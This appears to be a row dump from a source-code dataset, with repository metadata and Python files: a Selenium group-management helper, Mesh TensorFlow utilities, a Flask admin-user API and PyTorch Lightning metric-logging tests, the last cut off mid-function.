hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e21aa74fdbc519bddd054790b999af21ad2cf48d | 4,183 | py | Python | fixture/group.py | rooksever/python_training_skiba | be861d72d6f07fa1565ed12b97f6d4f04e6be1dc | [
"Apache-2.0"
] | null | null | null | fixture/group.py | rooksever/python_training_skiba | be861d72d6f07fa1565ed12b97f6d4f04e6be1dc | [
"Apache-2.0"
] | null | null | null | fixture/group.py | rooksever/python_training_skiba | be861d72d6f07fa1565ed12b97f6d4f04e6be1dc | [
"Apache-2.0"
] | null | null | null | from model.group import Group
class GroupHelper:
    """Selenium page-object helper for managing groups in the admin UI."""

    # Cache of Group models read from the group-list page.
    # Set to None by every mutating action so the next read refreshes it.
    group_cache = None

    def __init__(self, app):
        self.app = app

    def open_groups_page(self):
        """Navigate to the groups page unless it is already open."""
        wd = self.app.wd
        if not (wd.current_url.endswith("/group.php") and len(wd.find_elements_by_name("new")) > 0):
            wd.find_element_by_link_text("groups").click()

    def create(self, group):
        """Create a new group from the given Group model."""
        wd = self.app.wd
        self.open_groups_page()
        # init group creation
        wd.find_element_by_name("new").click()
        self.fill_group_form(group)
        # submit group creation
        wd.find_element_by_name("submit").click()
        self.return_to_groups_page()
        self.group_cache = None

    def delete_group_by_index(self, index):
        """Delete the group at the given list position."""
        wd = self.app.wd
        self.open_groups_page()
        # select the group at `index`
        self.select_group_by_index(index)
        # submit deletion
        wd.find_element_by_name("delete").click()
        self.return_to_groups_page()
        self.group_cache = None

    def select_group_by_index(self, index):
        wd = self.app.wd
        wd.find_elements_by_name("selected[]")[index].click()

    def select_group_by_id(self, id):
        wd = self.app.wd
        wd.find_element_by_css_selector("input[value='%s']" % id).click()

    def delete_first_group(self):
        self.delete_group_by_index(0)

    def edit_first_group(self, group):
        """Edit the first group in the list with the given Group data."""
        wd = self.app.wd
        self.open_groups_page()
        self.select_first_group()
        wd.find_element_by_name("edit").click()
        # edit group
        self.fill_group_form(group)
        # submit group edit
        wd.find_element_by_name("update").click()
        self.return_to_groups_page()
        self.group_cache = None

    def select_first_group(self):
        wd = self.app.wd
        wd.find_element_by_name("selected[]").click()

    def return_to_groups_page(self):
        """Follow the "group page" link back, unless already on the list."""
        wd = self.app.wd
        if not (wd.current_url.endswith("/group.php") and len(wd.find_elements_by_name("new")) > 0):
            wd.find_element_by_link_text("group page").click()

    def fill_group_form(self, group):
        wd = self.app.wd
        self.change_field_value("group_name", group.name)
        self.change_field_value("group_header", group.header)
        self.change_field_value("group_footer", group.footer)

    def change_field_value(self, field_name, text):
        # Only touch the field when a value was supplied; None means
        # "leave the existing value unchanged".
        wd = self.app.wd
        if text is not None:
            wd.find_element_by_name(field_name).click()
            wd.find_element_by_name(field_name).clear()
            wd.find_element_by_name(field_name).send_keys(text)

    def modify_group_by_index(self, index, new_group_data):
        """Open the group at `index` for editing and apply `new_group_data`."""
        wd = self.app.wd
        self.open_groups_page()
        self.select_group_by_index(index)
        # open modification page
        wd.find_element_by_name("edit").click()
        # fill group form
        self.fill_group_form(new_group_data)
        # submit modification
        wd.find_element_by_name("update").click()
        self.return_to_groups_page()
        self.group_cache = None

    def modify_first_group(self, new_group_data):
        # BUG FIX: previously called modify_group_by_index(0) without the
        # mandatory new_group_data argument, which always raised TypeError.
        self.modify_group_by_index(0, new_group_data)

    def count_groups(self):
        wd = self.app.wd
        self.open_groups_page()
        return len(wd.find_elements_by_name("selected[]"))

    def get_group_list(self):
        """Return Group models from the list page, using the cache when warm."""
        if self.group_cache is None:
            wd = self.app.wd
            self.open_groups_page()
            self.group_cache = []
            # to check elements on page use: $$('span.group') in the browser console
            for element in wd.find_elements_by_css_selector("span.group"):
                text = element.text
                id = element.find_element_by_name("selected[]").get_attribute("value")
                self.group_cache.append(Group(name=text, id=id))
        # return a copy so callers cannot mutate the cache
        return list(self.group_cache)

    def delete_group_by_id(self, id):
        """Delete the group whose checkbox value equals `id`."""
        wd = self.app.wd
        self.open_groups_page()
        self.select_group_by_id(id)
        # submit deletion
        wd.find_element_by_name("delete").click()
        self.return_to_groups_page()
        self.group_cache = None
| 33.464 | 117 | 0.634951 |
7a9f8b863701a4411fbf87fb790b83e1720ae23c | 4,790 | py | Python | mesh_tensorflow/utils.py | VonRosenchild/mesh | d26470554e086ea02e64154194097fbf517232bd | [
"Apache-2.0"
] | 1 | 2019-10-10T06:06:48.000Z | 2019-10-10T06:06:48.000Z | mesh_tensorflow/utils.py | HubBucket-Team/mesh | d26470554e086ea02e64154194097fbf517232bd | [
"Apache-2.0"
] | null | null | null | mesh_tensorflow/utils.py | HubBucket-Team/mesh | d26470554e086ea02e64154194097fbf517232bd | [
"Apache-2.0"
] | 1 | 2019-10-10T06:06:50.000Z | 2019-10-10T06:06:50.000Z | # coding=utf-8
# Copyright 2019 The Mesh TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for Mesh TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import tensorflow.compat.v1 as tf
from tensorflow.python.framework import ops # pylint: disable=g-direct-tensorflow-import
@contextlib.contextmanager
def outside_all_rewrites():
  """Context manager that clears any surrounding control dependencies.

  `ops.control_dependencies(None)` resets the dependency stack, so ops built
  inside this context are detached from enclosing control-flow rewrites.
  """
  with ops.control_dependencies(None):
    yield
class BalancedVariablePlacer(object):
  """Place the variable on different device and balance the memory usage."""

  def __init__(self, devices, init_usage=None):
    # Min-heap of (bytes_used, device) pairs: the least-loaded device is
    # always at the top of the heap.
    init_usage = init_usage if init_usage else [0] * len(devices)
    assert len(devices) == len(init_usage)
    self._mem_device_heap = list(zip(init_usage, devices))
    heapq.heapify(self._mem_device_heap)
    # Non-variable ops are co-located with the most recently placed variable.
    self._last_device = devices[0]

  def device_function(self, var):
    """Choose a device for the input variable.

    Args:
      var: a Variable op.

    Returns:
      The device for placing the var.
    """
    # Ops that are not variables follow the last variable placement.
    if var.type not in ('Variable', 'VariableV2', 'VarHandleOp'):
      tf.logging.debug('Place {} on last device: {}.'.format(
          var.name, self._last_device))
      return self._last_device

    shape = tf.TensorShape(var.get_attr('shape'))
    assert shape.num_elements() is not None

    size = var.get_attr('dtype').size
    # Pop the least-used device, charge it for this variable, push it back.
    mem, device = heapq.heappop(self._mem_device_heap)
    mem += shape.num_elements() * size
    heapq.heappush(self._mem_device_heap, (mem, device))
    tf.logging.debug('Place variable {} on {} and consumes {} Bytes.'.format(
        var.name, device, mem))
    self._last_device = device

    return device
# Graph collection name under which (name, scalar tensor) pairs are stored.
SCALAR_SUMMARIES_COLLECTION_KEY = 'mtf_scalar_summaries'


def create_host_call(model_dir):
  """Construct a host_call writing scalar summaries.

  Borrowed from t2t.

  TODO(noam): remove this code once there is a better way to get summaries on
  TPU.

  Args:
    model_dir: String containing path to train

  Returns:
    (fn, args) Pair to be called by TPUEstimator as the host_call.
  """
  graph = tf.get_default_graph()
  # a list of (name, lowered tensor) tuples
  summaries = graph.get_collection(SCALAR_SUMMARIES_COLLECTION_KEY)

  def maybe_cast(tensor):
    # TPU outfeed supports a limited set of dtypes: widen/narrow to
    # int32/float32 as needed.
    assert tensor.shape.is_compatible_with([]), tensor.name
    if tensor.dtype == tf.int64:
      return tf.to_int32(tensor)
    if tensor.dtype == tf.bfloat16:
      return tf.cast(tensor, tf.float32)
    return tensor

  # Outfed tensors must have rank >= 1, so reshape each scalar to [1].
  reshaped_tensors = [tf.reshape(maybe_cast(t), [1]) for _, t in summaries]

  # When no supported summaries are found, don't create host_call. Otherwise,
  # TPU outfeed queue would enqueue global_step while host_call doesn't dequeue
  # it, eventually causing hang.
  if not reshaped_tensors:
    return None

  def host_call_fn(global_step, *args):
    """Training host call. Creates scalar summaries for training metrics."""
    # This function is executed on the CPU and should not directly reference
    # any Tensors in the rest of the `model_fn`. To pass Tensors from the
    # model to the `model_fn`, provide as part of the `host_call`.
    global_step = tf.cast(global_step[0], tf.int64)
    with tf.summary.create_file_writer(model_dir).as_default():
      # We cannot directly use any tensor from summaries, because each
      # tensor here must be a concat of multiple tensors from all shards.
      # Therefore, we rely on the assumption that args will have the same
      # length as summaries, and all tensors in args will have the same
      # order of self._tup_summaries.
      assert len(args) == len(summaries)
      for i, tensor in enumerate(args):
        name = summaries[i][0]
        tf.summary.scalar(
            name, tf.reduce_mean(tensor), step=global_step)
      return tf.summary.all_v2_summary_ops()

  global_step_t = tf.reshape(tf.to_int32(tf.train.get_global_step()), [1])
  return host_call_fn, [global_step_t] + reshaped_tensors
def remove_summaries():
  """Remove scalar summaries from the default graph.

  Clears the collection in place (the collection list object is shared, so
  `del lst[:]` is required rather than rebinding) and verifies it is empty.
  """
  g = tf.get_default_graph()
  # Use the module-level constant instead of repeating the literal
  # 'mtf_scalar_summaries' (kept in sync with create_host_call).
  key = SCALAR_SUMMARIES_COLLECTION_KEY
  tf.logging.debug('Remove summaries %s' % str(g.get_collection(key)))
  del g.get_collection_ref(key)[:]
  assert not g.get_collection(key)
| 34.460432 | 89 | 0.720877 |
fc6dc3f3d385779193597c4163f8dd085bab5e48 | 2,331 | py | Python | apps/modules/user/apis/adm_user.py | worry45678/osroom | 1191e306fea5613e9b1e454c0d11662d0ed26e7a | [
"BSD-2-Clause"
] | 1 | 2020-04-03T08:01:07.000Z | 2020-04-03T08:01:07.000Z | apps/modules/user/apis/adm_user.py | dhgdhg/osroom | 4d693eaab96503cadd391bf924bffedcd931a07c | [
"BSD-2-Clause"
] | null | null | null | apps/modules/user/apis/adm_user.py | dhgdhg/osroom | 4d693eaab96503cadd391bf924bffedcd931a07c | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
# -*-coding:utf-8-*-
from flask import request
from apps.core.flask.login_manager import osr_login_required
from apps.configs.sys_config import METHOD_WARNING
from apps.core.blueprint import api
from apps.core.flask.permission import permission_required
from apps.core.flask.response import response_format
from apps.modules.user.process.adm_user import user, users, user_restore, user_activation, user_edit, user_del
from apps.core.flask.permission import permissions
__author__ = "Allen Woo"
@api.route('/admin/user', methods=['GET', 'PUT', 'DELETE'])
@osr_login_required
@permission_required(permissions(["USER_MANAGE"]))
def api_adm_user():
    """User administration endpoint.

    GET:
        1. Fetch basic info for one user
           id:<str>, user id
        2. Page through all users
           status:<str>, "normal" or "inactive" or "cancelled"
           page:<int>, page number (default 1)
           pre:<int>, results per page
           keyword:<str>, search keyword
    PUT:
        1. Edit a user
           id:<str>, user id
           role_id:<str>, role id
           active:<int>, 0 or 1
        2. Activate or freeze users
           op:<str>, "activation"
           active:<int>, 0 (freeze) or 1 (activate)
           ids:<array>
        3. Restore users (mark as not deleted)
           op:<str>, "restore"
           ids:<array>
    DELETE:
        Soft-delete users (not removed from the database)
        ids:<array>
    """
    method = request.c_method
    if method == "GET":
        # a single id means "fetch one user", otherwise page through all
        data = user() if request.argget.all('id') else users()
    elif method == "PUT":
        op = request.argget.all('op')
        if op == "restore":
            data = user_restore()
        elif op == "activation":
            data = user_activation()
        else:
            data = user_edit()
    elif method == "DELETE":
        data = user_del()
    else:
        data = {"msg_type": "w", "msg": METHOD_WARNING, "http_status": 405}
    return response_format(data)
@api.route('/admin/user/del', methods=['DELETE'])
@osr_login_required
@permission_required(permissions(["IMPORTANT_DATA_DEL"]))
def api_adm_user_del():
    '''
    DELETE:
        Permanently delete users (removed from the database).
        ids:<array>
        permanent:<int> 0 or 1; 0 means a soft delete (only the status is
        changed to "deleted"), 1 means the record is permanently removed.
    '''
    # Only DELETE is routed here; anything else yields a 405 warning payload.
    if request.c_method == "DELETE":
        data = user_del()
    else:
        data = {"msg_type":"w", "msg":METHOD_WARNING, "http_status":405}
    return response_format(data) | 27.423529 | 110 | 0.614329 |
dd034070809539ff94eb79ecc3208ab2777d63e5 | 21,375 | py | Python | tests/core/test_metric_result_integration.py | Tshimanga/pytorch-lightning | ff7305f74d4e097a45b6a4d8c0fff6d4f5aaa386 | [
"Apache-2.0"
] | 1 | 2021-12-17T15:33:29.000Z | 2021-12-17T15:33:29.000Z | tests/core/test_metric_result_integration.py | Tshimanga/pytorch-lightning | ff7305f74d4e097a45b6a4d8c0fff6d4f5aaa386 | [
"Apache-2.0"
] | null | null | null | tests/core/test_metric_result_integration.py | Tshimanga/pytorch-lightning | ff7305f74d4e097a45b6a4d8c0fff6d4f5aaa386 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
from contextlib import suppress
from copy import deepcopy
from unittest import mock
import pytest
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.nn import ModuleDict, ModuleList
from torchmetrics import Metric, MetricCollection
import tests.helpers.utils as tutils
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.trainer.connectors.logger_connector.result import MetricSource, ResultCollection
from pytorch_lightning.utilities.imports import _fault_tolerant_training, _TORCH_GREATER_EQUAL_1_7
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
class DummyMetric(Metric):
    """Metric that accumulates the sum of all values passed to ``update``."""

    def __init__(self):
        super().__init__()
        # single scalar state; summed across processes on sync
        self.add_state("x", torch.tensor(0), dist_reduce_fx="sum")

    def update(self, x):
        self.x += x

    def compute(self):
        return self.x
def _setup_ddp(rank, worldsize):
    """Join a gloo process group as ``rank`` of ``worldsize`` processes.

    The master port is expected to be set by the caller (e.g. via
    ``tutils.set_random_master_port()``).
    """
    # ``os`` is already imported at module scope; the redundant
    # function-local ``import os`` was removed.
    os.environ["MASTER_ADDR"] = "localhost"

    # initialize the process group
    dist.init_process_group("gloo", rank=rank, world_size=worldsize)
def _ddp_test_fn(rank, worldsize):
    """Worker run per process: log three metrics and verify DDP reduction."""
    _setup_ddp(rank, worldsize)
    torch.tensor([1.0])

    metric_a = DummyMetric()
    metric_b = DummyMetric()
    metric_c = DummyMetric()

    metric_a = metric_a.to(f"cuda:{rank}")
    metric_b = metric_b.to(f"cuda:{rank}")
    metric_c = metric_c.to(f"cuda:{rank}")

    result = ResultCollection(True, torch.device(f"cuda:{rank}"))

    for _ in range(3):
        cumulative_sum = 0
        for i in range(5):
            metric_a(i)
            metric_b(i)
            metric_c(i)
            cumulative_sum += i

            result.log("h", "a", metric_a, on_step=True, on_epoch=True)
            result.log("h", "b", metric_b, on_step=False, on_epoch=True)
            result.log("h", "c", metric_c, on_step=True, on_epoch=False)

            # step metrics are per-rank (no reduction yet)
            batch_log = result.metrics(True)[MetricSource.LOG]
            assert batch_log == {"a_step": i, "c": i}

        epoch_log = result.metrics(False)[MetricSource.LOG]
        result.reset()

        # assert metric state reset to default values
        assert metric_a.x == metric_a._defaults["x"], (metric_a.x, metric_a._defaults["x"])
        assert metric_b.x == metric_b._defaults["x"]
        assert metric_c.x == metric_c._defaults["x"]

        # epoch metrics are summed across the world
        assert epoch_log == {"b": cumulative_sum * worldsize, "a_epoch": cumulative_sum * worldsize}
@RunIf(skip_windows=True, min_gpus=2)
def test_result_reduce_ddp():
    """Make sure result logging works with DDP"""
    tutils.set_random_master_port()

    # spawn one process per (simulated) rank; the worker does the asserts
    worldsize = 2
    mp.spawn(_ddp_test_fn, args=(worldsize,), nprocs=worldsize)
def test_result_metric_integration():
    """Single-process version of the DDP test above, plus str/repr checks."""
    metric_a = DummyMetric()
    metric_b = DummyMetric()
    metric_c = DummyMetric()

    result = ResultCollection(True, torch.device("cpu"))

    for _ in range(3):
        cumulative_sum = 0
        for i in range(5):
            metric_a(i)
            metric_b(i)
            metric_c(i)
            cumulative_sum += i

            result.log("h", "a", metric_a, on_step=True, on_epoch=True)
            result.log("h", "b", metric_b, on_step=False, on_epoch=True)
            result.log("h", "c", metric_c, on_step=True, on_epoch=False)

            # only on_step=True entries appear in the step metrics
            batch_log = result.metrics(True)[MetricSource.LOG]
            assert batch_log == {"a_step": i, "c": i}

        epoch_log = result.metrics(False)[MetricSource.LOG]
        result.reset()

        # assert metric state reset to default values
        assert metric_a.x == metric_a._defaults["x"]
        assert metric_b.x == metric_b._defaults["x"]
        assert metric_c.x == metric_c._defaults["x"]

        assert epoch_log == {"b": cumulative_sum, "a_epoch": cumulative_sum}

    result.minimize = torch.tensor(1.0)
    result.extra = {}
    assert str(result) == (
        "ResultCollection("
        "minimize=1.0, "
        "{"
        "'h.a': ResultMetric('a', value=DummyMetric()), "
        "'h.b': ResultMetric('b', value=DummyMetric()), "
        "'h.c': ResultMetric('c', value=DummyMetric())"
        "})"
    )
    assert repr(result) == (
        "{"
        "True, "
        "device(type='cpu'), "
        "minimize=tensor(1.), "
        "{'h.a': ResultMetric('a', value=DummyMetric()), "
        "'h.b': ResultMetric('b', value=DummyMetric()), "
        "'h.c': ResultMetric('c', value=DummyMetric()), "
        "'_extra': {}}"
        "}"
    )
def test_result_collection_simple_loop():
    """Simulate two epochs of logging under different fx names and check the
    accumulated value / cumulated-batch-size bookkeeping per ResultMetric."""
    result = ResultCollection(True, torch.device("cpu"))
    current_fx_name = None
    batch_idx = None

    def lightning_log(fx, *args, **kwargs):
        # mimic LightningModule.log: reset the fx's state when the hook changes
        nonlocal current_fx_name
        if current_fx_name != fx and batch_idx in (None, 0):
            result.reset(metrics=False, fx=fx)
        result.log(fx, *args, **kwargs)
        current_fx_name = fx

    lightning_log("a0", "a", torch.tensor(0.0), on_step=True, on_epoch=True)
    lightning_log("a1", "a", torch.tensor(0.0), on_step=True, on_epoch=True)
    for epoch in range(2):
        lightning_log("b0", "a", torch.tensor(1.0) + epoch, on_step=True, on_epoch=True)
        lightning_log("b1", "a", torch.tensor(1.0) + epoch, on_step=True, on_epoch=True)
        for batch_idx in range(2):
            lightning_log("c0", "a", torch.tensor(2.0) + epoch, on_step=True, on_epoch=True)
            lightning_log("c1", "a", torch.tensor(2.0) + epoch, on_step=True, on_epoch=True)
            lightning_log("c2", "a", torch.tensor(2.0) + epoch, on_step=True, on_epoch=True)
        batch_idx = None
        lightning_log("d0", "a", torch.tensor(3.0) + epoch, on_step=False, on_epoch=True)
        lightning_log("d1", "a", torch.tensor(3.0) + epoch, on_step=False, on_epoch=True)

        for k in ("a0.a", "a1.a"):
            # logged once before the epoch loop and never reset afterwards
            assert result[k].value == torch.tensor(0.0), k
            assert result[k].cumulated_batch_size == torch.tensor(1.0), k

        for k in ("b0.a", "b1.a"):
            assert result[k].value == torch.tensor(1.0) + epoch, k
            assert result[k].cumulated_batch_size == torch.tensor(1.0), k

        for k in ("c0.a", "c1.a", "c2.a"):
            # accumulated over the 2 batches of the current epoch
            assert result[k].value == torch.tensor(4.0) + epoch * 2, k
            assert result[k].cumulated_batch_size == torch.tensor(2.0), k

        for k in ("d0.a", "d1.a"):
            assert result[k].value == torch.tensor(3.0) + epoch, k
            assert result[k].cumulated_batch_size == torch.tensor(1.0), k
def my_sync_dist(value, *_, **__):
    # No-op stand-in for a distributed reduction: the first positional
    # argument is returned unchanged and every other argument is ignored.
    return value
def test_result_collection_restoration(tmpdir):
    """
    This test make sure metrics are properly reloaded on failure.
    """

    result = ResultCollection(True, torch.device("cpu"))
    metric_a = DummyMetric()
    metric_b = DummyMetric()
    metric_c = DummyMetric()
    metric_d = DummyMetric()
    current_fx_name = None
    batch_idx = None

    def lightning_log(fx, *args, **kwargs):
        # mimic LightningModule.log: reset the fx's state when the hook changes
        nonlocal current_fx_name
        if current_fx_name != fx and batch_idx in (None, 0):
            result.reset(metrics=False, fx=fx)
        result.log(fx, *args, **kwargs, sync_dist_fn=my_sync_dist)
        current_fx_name = fx

    for epoch in range(2):

        cumulative_sum = 0

        for i in range(3):

            a = metric_a(i)
            b = metric_b(i)
            c = metric_c(i)
            metric_d(i)
            cumulative_sum += i

            # from the second batch on, "a" is logged from a different Metric
            metric = metric_a if i < 1 else metric_d
            lightning_log("training_step", "a", metric, on_step=True, on_epoch=True, metric_attribute="metric")
            lightning_log("training_step", "b", metric_b, on_step=False, on_epoch=True, metric_attribute="metric_b")
            lightning_log("training_step", "c", metric_c, on_step=True, on_epoch=False, metric_attribute="metric_c")

            lightning_log("training_step", "a_1", a, on_step=True, on_epoch=True)
            lightning_log("training_step", "b_1", b, on_step=False, on_epoch=True)
            lightning_log("training_step", "c_1", {"1": c, "2": c}, on_step=True, on_epoch=False)

            batch_log = result.metrics(on_step=True)[MetricSource.LOG]
            assert set(batch_log) == {"a_step", "c", "a_1_step", "c_1"}
            assert set(batch_log["c_1"]) == {"1", "2"}

            # round-trip the collection through its state dict
            result_copy = deepcopy(result)
            new_result = ResultCollection(True, torch.device("cpu"))
            state_dict = result.state_dict()
            # check the sync fn was dropped
            assert "fn" not in state_dict["items"]["training_step.a"]["meta"]["_sync"]

            assert not new_result.result_metrics
            # 7 result metrics in epoch 0, plus "train_epoch_end.a" afterwards
            assert len(result.result_metrics) == 7 + epoch > 0

            new_result.load_state_dict(
                state_dict, metrics={"metric": metric, "metric_b": metric_b, "metric_c": metric_c}
            )
            # should match
            assert result_copy == new_result
            # the sync fn has been kept
            assert result_copy["training_step.a"].meta.sync.fn == new_result["training_step.a"].meta.sync.fn

            epoch_log = result.metrics(on_step=False)[MetricSource.LOG]
            epoch_log_copy = result_copy.metrics(on_step=False)[MetricSource.LOG]
            assert epoch_log == epoch_log_copy

        lightning_log("train_epoch_end", "a", metric_a, on_step=False, on_epoch=True)
        epoch_log = result.metrics(on_step=False)[MetricSource.LOG]
        assert epoch_log == {
            "a_1_epoch": 1,
            "a_epoch": cumulative_sum,
            "a": cumulative_sum,
            "b": cumulative_sum,
            "b_1": 1,
        }

        # make sure can be pickled
        pickle.loads(pickle.dumps(result))
        # make sure can be torch.loaded
        filepath = str(tmpdir / "result")
        torch.save(result, filepath)
        torch.load(filepath)

        # assert metric state reset to default values
        result.reset()
        assert metric_a.x == metric_a._defaults["x"]
        assert metric_b.x == metric_b._defaults["x"]
        assert metric_c.x == metric_c._defaults["x"]

        batch_idx = None
@pytest.mark.parametrize("device", ("cpu", pytest.param("cuda", marks=RunIf(min_gpus=1))))
def test_lightning_module_logging_result_collection(tmpdir, device):
class LoggingModel(BoringModel):
def __init__(self):
super().__init__()
self.metric = DummyMetric()
def validation_step(self, batch, batch_idx):
v = self.metric(batch_idx)
self.log_dict({"v": v, "m": self.metric})
return super().validation_step(batch, batch_idx)
def on_save_checkpoint(self, checkpoint) -> None:
results = self.trainer._results
# simplify logic
state_dict = results.state_dict(drop_value=False)
# check device
assert results["validation_step.v"].value.device.type == device
assert state_dict["items"]["validation_step.v"]["value"].device.type == device
# sync fn should be kept
assert results["validation_step.v"].meta.sync.fn == self.trainer.training_type_plugin.reduce
# sync fn dropped from the state dict
assert "fn" not in state_dict["items"]["validation_step.v"]["meta"]["_sync"]
results.load_state_dict(state_dict)
# check device after loading
assert results["validation_step.v"].value.device.type == device
# sync fn was preserved in the original result
assert results["validation_step.v"].meta.sync.fn == self.trainer.training_type_plugin.reduce
# default sync fn
new_results = ResultCollection(False, device)
new_results.load_state_dict(state_dict, map_location="cpu")
assert new_results["validation_step.v"].meta.sync.fn is None
# check map location
assert new_results["validation_step.v"].value.device.type == "cpu"
model = LoggingModel()
ckpt = ModelCheckpoint(dirpath=tmpdir, save_on_train_epoch_end=False)
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=2,
limit_train_batches=2,
limit_val_batches=2,
callbacks=[ckpt],
gpus=1 if device == "cuda" else 0,
)
trainer.fit(model)
def test_result_collection_extra_reference():
    """The ``extra`` attribute must alias the ``"_extra"`` entry exactly."""
    collection = ResultCollection(True)
    # identity (not merely equality) is the contract under test
    assert collection.extra is collection["_extra"]
class DummyMeanMetric(Metric):
    """Metric computing the *integer* mean (floor division) of the updates."""

    def __init__(self):
        super().__init__()
        # running total and number of updates; both summed across processes
        self.add_state("sum", torch.tensor(0), dist_reduce_fx=torch.sum)
        self.add_state("count", torch.tensor(0), dist_reduce_fx=torch.sum)

    def update(self, increment):
        self.sum += increment
        self.count += 1

    def compute(self):
        # NOTE: floor division on purpose -- the reload tests below rely on
        # the truncated integer result (e.g. 10 // 5 == 2)
        return self.sum // self.count

    def __repr__(self) -> str:
        return f"{self.__class__.__name__}(sum={self.sum}, count={self.count})"
def result_collection_reload(**kwargs):
    """
    This test is going to validate ResultCollection is properly being reload
    and final accumulation with Fault Tolerant Training is correct.
    """

    if not _fault_tolerant_training():
        pytest.skip("Fault tolerant not available")

    num_processes = kwargs.get("gpus", 1)

    class CustomException(Exception):
        pass

    class ExtendedBoringModel(BoringModel):
        def __init__(self):
            super().__init__()
            self.breaking_batch_idx = 3
            self.has_validated_sum = False
            self.dummy_metric = DummyMeanMetric()

        @property
        def results(self):
            return self.trainer.fit_loop._results

        def training_step(self, batch, batch_idx):

            # In the training step, we will accumulate metrics using batch_idx from 0 to 4
            # Without failure, we would expect to get `total=10 * world_size` and `num_batches=5 * world_size`
            # Therefore, compute on `epoch_end` should provide 2 as `10 / 5`.
            # However, below we will simulate a failure on `batch_idx=3`.

            if self.trainer.fit_loop.restarting:
                self.log("tracking", batch_idx, on_step=True, on_epoch=True)
                self.log("tracking_2", batch_idx, on_step=True, on_epoch=True, sync_dist=True)

                self.dummy_metric(batch_idx)
                self.log("tracking_metric", self.dummy_metric, on_step=True, on_epoch=True)

                value = self.results["training_step.tracking_metric"].value
                value_2 = self.results["training_step.tracking"].value

                # On failure, the Metric states are being accumulated on rank 0 and zeroed-out on other ranks.
                # The shift indicates we failed while the state was `shift=sign(is_global_zero > 0) * [0..3]`
                shift = 0
                if num_processes == 2:
                    shift = 3 if self.trainer.is_global_zero else -3
                expected = sum(range(batch_idx + 1)) + shift
                assert expected == value == value_2
            else:
                if batch_idx == self.breaking_batch_idx:
                    # simulate failure mid epoch
                    raise CustomException

                self.log("tracking", batch_idx, on_step=True, on_epoch=True)
                self.log("tracking_2", batch_idx, on_step=True, on_epoch=True, sync_dist=True)

                self.dummy_metric(batch_idx)
                self.log("tracking_metric", self.dummy_metric, on_step=True, on_epoch=True)

                value = self.results["training_step.tracking"].value
                assert value == sum(range(batch_idx + 1))

                # NOTE(review): no `.value` here -- this compares the
                # ResultMetric object itself to an int; presumably relies on
                # its __eq__ -- confirm against ResultMetric's implementation
                value = self.results["training_step.tracking_2"]
                assert value == sum(range(batch_idx + 1))

            return super().training_step(batch, batch_idx)

        def on_epoch_end(self) -> None:
            # only validated on the resumed (restarting) run
            if self.trainer.fit_loop.restarting:
                total = sum(range(5)) * num_processes
                metrics = self.results.metrics(on_step=False)
                assert self.results["training_step.tracking"].value == total
                assert metrics[MetricSource.CALLBACK]["tracking"] == self.dummy_metric.compute() == 2
                assert self.results["training_step.tracking_2"].value == total
                assert metrics[MetricSource.CALLBACK]["tracking_2"] == self.dummy_metric.compute() == 2
                self.has_validated_sum = True

    model = ExtendedBoringModel()
    trainer_kwargs = {"max_epochs": 1, "limit_train_batches": 5, "limit_val_batches": 0}
    trainer_kwargs.update(kwargs)
    trainer = Trainer(**trainer_kwargs)

    # first run fails mid-epoch with the simulated exception
    with suppress(CustomException):
        trainer.fit(model)

    assert not model.has_validated_sum

    tmpdir = (
        trainer.training_type_plugin.broadcast(trainer_kwargs["default_root_dir"], 0)
        if num_processes >= 2
        else trainer_kwargs["default_root_dir"]
    )
    ckpt_path = os.path.join(tmpdir, ".pl_auto_save.ckpt")
    trainer_kwargs["resume_from_checkpoint"] = ckpt_path

    # second run resumes from the auto-saved checkpoint and must succeed
    trainer = Trainer(**trainer_kwargs)
    trainer.fit(model)
    assert model.has_validated_sum
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.skipif(not _TORCH_GREATER_EQUAL_1_7, reason="Requires at least PyTorch 1.7")
def test_result_collection_reload(tmpdir):
    # single-process CPU variant of the fault-tolerant reload scenario
